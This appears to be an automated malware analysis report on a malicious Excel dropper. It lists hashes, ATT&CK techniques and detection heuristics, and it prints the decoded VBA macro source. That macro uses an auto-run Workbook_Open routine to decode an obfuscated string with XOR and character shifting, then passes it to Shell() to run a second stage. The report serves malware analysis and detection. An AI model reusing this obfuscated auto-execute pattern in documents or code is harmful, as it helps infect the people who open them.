Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6f1bcd419a827a9d…

MALICIOUS

Office (OLE)

Size: 71.5 KB
Created: 2019-05-29 13:00:49
Authoring application: Microsoft Excel
First seen: 2019-05-31
MD5: cf00bd9418747f34c75aaa6bd37aa6d1
SHA-1: 18fd97434f65314e0b907f9db6fc5556a5842852
SHA-256: 6f1bcd419a827a9dbdbfef3dfd228d75fdb9844a58f62c9d7a1584dbfb18046a
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The critical heuristic 'OLE_VBA_SHELL' and the presence of a 'Workbook_Open' macro indicate that the Excel file is designed to execute malicious code upon opening. The VBA code is obfuscated, but the 'Welcome' function appears to decrypt a string which is then passed to the 'Shell' function. This strongly suggests the file acts as a dropper for a second-stage payload, likely downloaded from a remote source, aligning with the ClamAV detection signature 'Xls.Dropper.Agent-7006547-0'.

Heuristics 4

  • ClamAV: Xls.Dropper.Agent-7006547-0 [severity: critical, rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Dropper.Agent-7006547-0
  • VBA macros detected [severity: medium, rule: OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [severity: critical, rule: OLE_VBA_SHELL]
    Shell() call in VBA
  • Workbook_Open macro [severity: high, rule: OLE_VBA_WBOPEN]
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2150 bytes
SHA-256: b6bcd7fe002517ed322d564e6ed59010b3fc694d132f2254ed36d54907a63c79
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "このワークブック"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True









































































Public Function Welcome(ByVal mathh As String, ByVal Paraf As String) As String
Dim a, b, c, d As String
Dim kios As Long
Dim doggy As Long
Dim cn As Long
c = mathh
b = Paraf
a = ""
kios = Len(c)
doggy = Len(b)
For cn = 1 To kios Step 3
a = a + Chr(Val(Mid(c, cn, 3)) Xor Asc(Mid(b, (Int(cn / 3) Mod doggy) + 1, 1)))
Next cn
Welcome = a
End Function
Private Sub Workbook_Open()
'debug.print
If xlXmlExportValidationFailed > 0 Then oceran
End Sub
Function lowsharts()
lowsharts = timefortime(3 - 2, 2 - 1)
End Function

Function Beta1()
fdsgfadsrff436tgdfzf33546s = 1 + (Application.International(LittlePeace) - 1)
Beta1 = fdsgfadsrff436tgdfzf33546s
End Function

Function LittlePeace()
LittlePeace = ((xlDate))
End Function


Function WestAndS(aAA As String)
Dim ligiums, efrat As String
Dim wq, Dego, vert As Integer
Dego = 2
ligiums = aAA
For wq = 1 To Len(ligiums)
vert = Asc(Mid(ligiums, wq, 1)) - Dego
efrat = efrat & Chr(vert)
Next wq
WestAndS = efrat
End Function

Private Sub oceran()
If xlMillimeters > 0 Then
Ags = 3.29845103217598E+76
If msoComboLabel > 0 Then XlForecastChartTypes = (Shell#(Welcome(WestAndS(lowsharts), Beta1 * 3), Sgn(123.67) - 1))
End If
End Sub

Function timefortime()
timefortime = Cells
End Function

Function mister()
mister = Welcome(LeftBeta1 * 3 + "abcABC")
End Function








Attribute VB_Name = "シート3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True